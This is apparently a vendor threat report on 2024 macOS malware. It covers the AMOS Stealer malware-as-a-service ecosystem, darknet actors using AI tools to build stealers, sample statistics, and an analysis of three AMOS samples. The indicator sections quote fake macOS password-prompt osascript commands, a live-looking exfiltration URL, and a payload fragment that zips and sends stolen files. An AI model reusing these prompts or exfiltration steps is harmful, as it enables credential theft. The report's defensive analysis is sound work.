For decades, Apple devices have enjoyed a reputation for being mostly malware-free. However, with a 60 percent increase in market share in the last 3 years alone, macOS has become a prime target for cybercriminals, and the tide is turning.
Now, macOS-targeting malware is on the rise, and stealers have become a critical cybersecurity concern for macOS users. In this 2024 macOS threat report, Moonlock Lab dives into the growing threats facing macOS.
The growing threat landscape targeting macOS
2024 saw a noteworthy increase in malicious activity targeting macOS users, with significant growth in both the variety and accessibility of macOS malware. The darknet was flooded with posts and discussions on bypassing macOS defenses, leveraging AI tools for malware development, and capitalizing on social engineering to distribute macOS malware-as-a-service (MaaS).
One striking shift has been the decrease in costs associated with acquiring macOS malware. A malware service that once might have cost tens of thousands of dollars is now available for just around $1,500 per month.
AI tools powering macOS malware development
In 2024, we’ve seen threat actors turn to AI tools like ChatGPT to simplify the process of malware creation. Screenshots from darknet forums reveal interactions with AI that guide attackers step-by-step on how to pack macOS malware with PyInstaller, create DMG files, extract Keychain data, and even target crypto wallets. One Russian-speaking threat actor known as “barboris” openly shared their process, using AI to piece together a macOS stealer while admitting they had no prior coding experience.
This highlights a troubling shift: AI is empowering inexperienced individuals to create malware.
With just a few prompts, attackers can generate scripts and implement advanced techniques that would have required significant expertise in the past. The barrier to entry is lower than ever, and AI has become a new ally for cybercriminals seeking to launch macOS-focused campaigns.
The rise of MaaS
The macOS malware landscape has shifted with the rise of malware-as-a-service (MaaS). What once required significant resources — like the $100,000 macOS certificates sold by the actor RastaFarEye in 2023 — can now be achieved with simple social engineering tactics.
Attackers are increasingly providing installation guidance to their victims, offering instructions that trick them into manually bypassing macOS’s Gatekeeper, thus eliminating the need for expensive certificates.
MaaS has made macOS malware more accessible than ever. On October 20, 2024, the Russian-speaking actor NeoOriginal announced an upcoming macOS stealer priced below market averages, reflecting growing competition in the malware economy. This affordability lowers barriers for attackers and expands the pool of potential adversaries.
With tools becoming cheaper and easier to use, macOS threats are no longer as rare as they used to be. The rise of MaaS means we’re likely to see even more widespread and diverse campaigns targeting macOS users in the near future.
AMOS Stealer as an example of the MaaS ecosystem
The rise of MaaS has not only lowered the cost of macOS malware but has also transformed the way cybercriminal operations are structured.
AMOS Stealer, one of the most prominent macOS MaaS offerings, serves as a perfect example of how this model operates. From its initial launch in April 2023, AMOS has demonstrated a well-coordinated system that can efficiently drive malware campaigns at scale.
By breaking down the structure of AMOS Stealer, we can see how the MaaS model works in practice and why it has become a game-changer for macOS malware. Let’s dive into how each role contributes to this ecosystem.
The core of AMOS Stealer’s operation lies with its developer, known as “atomicseller.” Initially offering AMOS on the XSS forum for $1,000 a month, the developer provided a comprehensive package that included a customizable malware builder, an administrative panel for log management, and features for targeting Keychain data, cryptocurrency wallets, and sensitive files.
Additionally, atomicseller promoted AMOS through a dedicated Telegram channel, amos_macos. This channel served as a hub for direct purchase inquiries and updates, with contact information pointing to accounts like @Ping3r (redirecting to @DrKarlik).
One of AMOS’s standout features is its administrative panel, a centralized hub designed to streamline operations for Stealer operators. The panel offers an overview of stolen data, including cookies, passwords, credit card details, and more.
A key feature of the administrative panel is the File Builder feature, which allows affiliates to customize malware packages for specific campaigns. This functionality enables threat actors to adapt AMOS to different scenarios and tailor delivery methods to maximize success.
Interestingly, it was an affiliate, “MRKiskis,” who suggested improvements such as implementing an Autobuilder feature and providing file generation via API. These ideas were eventually adopted, enhancing the File Builder’s functionality and making AMOS more attractive to its user base.
Another feature is the Cookie Converter, which simplifies the exploitation of stolen cookies. The tool includes 2 fields: cookie input and cookie output. Affiliates can paste raw cookie data into the input field, and the tool automatically processes it into usable formats for session hijacking.
These advanced tools significantly enhance the effectiveness of AMOS’s affiliates, particularly the traffer teams responsible for distributing the malware.
Traffers use diverse methods such as Google Ads poisoning, fake GitHub repositories, and impersonated software downloads to distribute AMOS. Victim data — cookies, passwords, credit card details — are then sold on forums like COOKIE.PRO, where the AMOS developer is believed to have direct ties. Affiliates also promote their services on the Telegram group AMOS LOGS CHAT (t.me/chatamos), often coordinating campaigns and sharing updates.
Several potential affiliates have been linked to AMOS operations:
- Tonbrute: Active on multiple forums, involved in money laundering and fraud
- Metafb: Specializes in distributing malware through Facebook campaigns
- am2aw: Focuses on selling stolen credit card information
One affiliate, known as Baptist, played a prominent role by targeting victims via Google Ads and selling AMOS-generated logs. Buyers of these logs typically exploit the stolen data to hijack sessions, steal funds, or resell the credentials to other threat actors.
This structured ecosystem — comprising developers, traffer teams, and log buyers — shows how the MaaS model thrives on collaboration. Each role is crucial: Developers create and maintain the tools, traffers distribute the malware, and buyers monetize the stolen data. Together, they create a streamlined system that allows even inexperienced attackers to profit.
It’s worth noting that this streamlined system not only lowers barriers for attackers but also aligns with the broader growth in macOS malware, as highlighted in the 2023–2024 sample statistics you will see below.
Malware Statistics: A comparative view of 2023 vs. 2024
When comparing malware sample counts from 2023 to 2024, some fascinating trends emerge. While we can’t be 100% certain about the motives behind these shifts, the data paints a picture of evolving cyber threats and operational strategies. Here’s a brief overview of what stood out this year.
Adware is still the leader
At first glance, the significant drop in adware samples in 2024 might lead us to believe that defenses have improved or attackers have deprioritized adware. However, our internal statistics tell a different story.
Adware still accounts for a staggering 73.37% of all malware detections in 2024 — and we’re not talking about hundreds of cases but millions of detections. This underscores the fact that adware remains a dominant threat in terms of scale, even if the sample counts in 2024 appear lower than in 2023.
The discrepancy likely points to a refinement in attacker strategies. Adware campaigns may now be more focused, using fewer samples to deliver widespread infections. Alternatively, improved targeting mechanisms or distribution methods could explain the lower sample volume but continued high detection rates.
The April spikes in backdoors and exploits samples
Backdoor and exploit samples alike experienced significant spikes in April 2024 of their respective totals. This parallel trend raises the question of whether attackers were using exploits to deploy backdoors during this time.
The charts strongly suggest coordinated campaigns. These types of malware often go hand-in-hand. Exploits provide entry points, and backdoors ensure persistence.
Ransomware: Major presence, low user impact
Ransomware trends in 2024 reveal an interesting contradiction. While sample activity shows notable peaks in June and October, detection rates among users paint a different picture.
Ransomware detections accounted for just 0.011% of all malware detections among individual users despite the large number of samples observed on platforms like VirusTotal.
This discrepancy may reflect the nature of ransomware campaigns. Ransomware often targets corporations and companies, where attackers can demand larger payouts and cause more disruption. By contrast, individual users are less frequently targeted. Many ransomware samples circulating in the wild may also be under development, used in testing, or poorly distributed.
Accessible and ever-evolving stealers
Stealers stand out as one of the fastest-evolving malware categories. Their accessibility through MaaS offerings has led to a dramatic increase in samples. In 2024, these tools have become more accessible than ever, with some being offered for as little as $1,500 per month on underground forums.
This affordability has likely contributed to the October spike, as more individuals or groups can now afford to buy and deploy them. But it’s not just about accessibility — stealers have also become incredibly dynamic. The malware ecosystem resembles an ongoing cat-and-mouse game: Developers work tirelessly to evade static detection, releasing obfuscation updates almost weekly. This rapid evolution means that tens of new samples are being generated every week, further contributing to the growing volume of activity we observe.
For a deeper dive, we’ll explore 3 comparative samples — one from the end of 2023, another from May 2024, and a final sample from late 2024 — in the next section. These examples will highlight how stealers are evolving, their obfuscation tactics, and what defenders need to watch for in the future.
A look at macOS malware techniques
While macOS malware has seen growth in volume and accessibility, it still lacks the level of sophistication found in Windows malware. One key example of this is the use of packers.
In 2024, we didn’t observe many custom packers tailored specifically for macOS threats. Instead, adversaries relied heavily on readily available tools like PyInstaller, UPX, ShellCompiler, and Nuitka.
Similarly, VM evasion techniques in macOS malware demonstrate some strategic but limited implementation. In 2024, June and October saw the highest usage of VM evasion, while other months, like January, showed minimal adoption.
This variability indicates that VM evasion is not yet a universal feature in macOS malware but is instead deployed selectively during specific campaigns.
Evolution of AMOS (Atomic Stealer): A comparative analysis of samples
To illustrate the development of macOS malware, we analyzed 3 distinct samples of AMOS (Atomic Stealer) from different periods in 2023–2024. This evolution highlights the ongoing adaptation and refinement of malicious techniques used by macOS-focused threat actors.
It’s well known that the trend of macOS PSW stealers is growing, as they consistently bring profits to cybercriminals. This means that certain processes will continue to evolve:
- Malware development: In this case, we will focus on continuous improvements in malware capabilities to resist analysis and evade detection.
Throughout the year, we have monitored malware linked to AMOS groups. So, we have prepared 3 malware samples for you, each highlighting certain characteristics. In the table below, you will find the main differences between them.
Note that in the context of this section, the payload is defined as the main functionality of the stealer that the malware developer aims to conceal from analysis and detection.
| Property | Sample-End-2023 | Sample-Mid-2024 | Sample-End-2024 |
| VirusTotal first submission | 2023-11-14 | 2024-05-14 | 2024-11-11 |
| Application type | DMG with malware Macho | DMG with malware Macho | DMG with malware Macho |
| Using AppleScript interpreter for stealer logic | Yes | Yes | Yes |
| Using Bash interpreter for stealer logic | Yes | Yes | Yes |
| Install image prompts the user, bypassing GateKeeper | Yes | Yes | Yes |
| AppleScript prompt to enter user password | Yes | Yes | Yes |
| Similar file name: “Sysinfo.txt” | Yes | Yes | No |
| The “FileGrabber” string in payload | plaintext | plaintext | Obfuscated, observable in behavior |
| Path string in URL (extract user data) | “/sendlog” | “/joinsystem” | “/joinsystem” |
| Cmd “system_profiler” for gathering system information | Yes | Yes | Yes |
| Property | Sample-End-2023 | Sample-Mid-2024 | Sample-End-2024 |
| Languages | Swift, Objective-C, C++ | C++ | C++ |
| Payload Obfuscation | No | The plaintext payload is split into small parts | The payload is obfuscated through multiple layers |
| Code Obfuscation | No | Excessive functions to hinder analysis | Excessive functions to hinder analysis |
Key takeaways on stealer evolution
We observed a trend over the last year where AppleScript and Bash were used to implement the functionality of stealers. For example, in the Sample-End-2023 column in the chart above, stealer functionality was tightly integrated with the code, but no obfuscation was applied.
Malware developers began to realize that the time required for analysis and the ease of detection directly impact their revenue, leading them to improve subsequent iterations.
In Sample-Mid-2024, Swift and Objective-C dependencies are absent, and obfuscation was introduced. However, this obfuscation was not sufficiently effective and only marginally increased the stealer’s lifespan.
Currently, in Sample-End-2024, the C++ code serves as a dynamic wrapper that constantly changes and deobfuscates the payload differently for further execution. Instead, the payload contains all the stealer’s functionality and realizes it using the AppleScript and Bash interpreters.
A logical conclusion is that the next step will involve altering behavior, making it vary across samples of the same generation.
Below, you will find more extensive information.
Samples Data
Sample-End-2023
sha256:
- a40d65307e67af3f18246669957114fa5f5e8de3bd7e2178b86e6a78f644dcf3 – dmg
- eed1859b90b8832281786b74dc428a01dbf226ad24b182d09650c6e7895007ea – macho
Behavior IoC
/usr/bin/osascript osascript -e display dialog 'macOS needs to access System settings Please enter your password.' with title 'System Preferences' with icon file 'System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns' default answer '' giving up after 30 with hidden answerData IoC
http://194.169.175.117/sendlog
/Sysinfo.txt
FileGrabber
osascript -e '
Banch:
system_profiler SPHardwareDataType
system_profiler SPDisplaysDataType
sw_versSample-Mid-2024
sha256:
- 4daed3dac458d35ffc8ce69208b414054330cfe658f73d48f8ac79ecf7aad2b7 – dmg
- 8eced9a4c30be965c24e5275c5d80356a197cfceb449a5b17a65c04ef336ba70 – macho
Behavior IoC
/usr/bin/osascript osascript -e display dialog 'To launch the application, you need to update the system settings \n\nPlease enter your password.' with title 'System Preferences' with icon caution default answer '' giving up after 30 with hidden answer
/usr/bin/osascript osascript -e tell application 'Terminal' to set visible of front window to false
/usr/bin/sw_vers sw_vers
/usr/sbin/system_profiler system_profiler SPDisplaysDataType
/usr/sbin/system_profiler system_profiler SPHardwareDataTypeData IoC
FileGrabber
osascript -e '
/joinsystem
/Sysinfo.txt
system_profiler SPHardwareDataType
system_profiler SPDisplaysDataType
sw_versSample-End-2024
sha256:
- 394fb5a7321ef62296d7119efe0874626aaf03ab033544428a120f648da0323b – dmg
- 3aa19478fd67fcc5faaa2eebb01046594394c43619640e10b5a7ec79613c8314 – macho
Behavior IoC
... repeatset result to display dialog 'Required Application Helper.\nPlease enter password for continue.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'System Preferences' with hidden answerset password_entered to text returned of resultif checkvalid(username, password_entered) ...
... do shell script 'ditto -c -k --sequesterRsrc ' & writemind & ' /tmp/out.zip'send_data(0)do shell script 'rm -r ' & writeminddo shell script 'rm /tmp/out.zip' ...Decoded Data IoC
/joinsystem
FileGrabber
osascript -e '
system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataTypeSimilarities among samples
As we can see in these samples, common patterns are observable. Some of them appear consistently from Sample-End-2023 to Sample-Mid-2024 and from Sample-Mid-2024 to Sample-End-2024:
- All the samples use AppleScript (string “osascript -e ‘”) to run stealer logic.
- The same dmg installation scheme with an image prompts the user to install an application, bypassing Gatekeeper (e.g., “1 STEP,” “RIGHT CLICK,” “2 STEP,” “CLICK OPEN”).
- A similar privilege escalation method appears, where an AppleScript prompt asks the user to enter their password under various pretenses (e.g., “… display dialog …”).
- Identical commands for gathering system information are used (“system_profiler,” “SPHardwareDataType,” “SPDisplaysDataType”).
- Similar file names, such as “Sysinfo.txt,” appear in the first 2 samples.
- The “FileGrabber” name is present. It’s in plaintext in the first 2 samples. In the last one, it’s obfuscated but observable in behavior.
- Similar URLs follow the format ip/domain + 1 string as the URL path (e.g., “/sendlog” in the first sample, “/joinsystem” in the following 2).
Binary features
Sample-End-2023
Language
- The list of libraries indicates that the application was created using the following languages: Swift, Objective-C, and C++.
...
58 0x00000c10 /usr/lib/libobjc.A.dylib
59 0x00000c48 /usr/lib/libc++.1.dylib
60 0x00000c78 /usr/lib/libSystem.B.dylib
...
62 0x00000d08 /usr/lib/swift/libswiftCore.dylib
63 0x00000d48 /usr/lib/swift/libswiftCoreFoundation.dylib
64 0x00000d90 /usr/lib/swift/libswiftCoreImage.dylib
...Obfuscation
- (No)
We see string artifacts indicating stealer functionality. It appears that for this iteration, the stealer developers did not bother with obfuscation to complicate analysis and detection.
Sample-Mid-2024
Language
- Created using C++
33 0x0000068c /usr/lib/dyld
...
35 0x00000718 /usr/lib/libc++.1.dylib
36 0x00000748 /usr/lib/libSystem.B.dylibObfuscation
- (Yes)
An excessive number of functions is used to confuse the analysis.
There is no encoding or encryption of the payload visible in the screenshots. The payload is split into small parts and stored in different memory locations. This is intended to make static analysis or detection harder.
However, in reality, this is not an effective obfuscation technique because some fragments are stored sequentially in memory, making it quick to understand the logic and create a signature.
Sample-End-2024
Language
- Created using C++
23 0x000004fc /usr/lib/dyld
24 0x00000588 /usr/lib/libc++.1.dylib
25 0x000005b8 /usr/lib/libSystem.B.dylibObfuscation
- (Yes)
At first glance, the payload obfuscation uses a “hex to string” method, which is easy to analyze.
However, this is just the beginning. After conversion, we get unreadable text that will be processed later in the code to complicate the analysis.
As seen in the screenshots below, we can highlight the following key points:
- Payload processing is localized across many functions to make analysis harder.
- Non-standard methods are used sequentially.
- Comparing similar samples from late 2024 shows that the processing pattern and function call order keep changing, making static detection more difficult and using patterns for malware code generation.
The behavioral pattern shown below has remained almost unchanged in recent months, meaning dynamic (behavior-based) detection will still work.
The payload uses AppleScript and Bash interpreters and handles all the stealer’s logic. The C++ code implements an obfuscated wrapper that deobfuscates and executes the payload.
Key takeaways and how to stay safe
MacOS malware is evolving fast. With MaaS making malware cheaper and easier to access, we’ve seen how whole teams and business models are driving this growth. The 2023–2024 statistics show persistent threats like adware, backdoors, and stealers adapting to stay effective.
Our look at AMOS Stealer samples from late 2023 to 2024 shows just how much effort attackers put into avoiding detection. As defenses move toward behavior-based detection, the logical next step for attackers will be to alter malware behavior dynamically, making it unpredictable across samples.
But the most important takeaway is this: Awareness is key. Attackers rely heavily on tricking people through social engineering. By staying alert, avoiding suspicious downloads, and questioning prompts that don’t feel right, we can protect ourselves and stay ahead of these evolving threats.
This is an independent publication, and it has not been authorized, sponsored, or otherwise approved by Apple Inc. Mac and macOS are trademarks of Apple Inc.
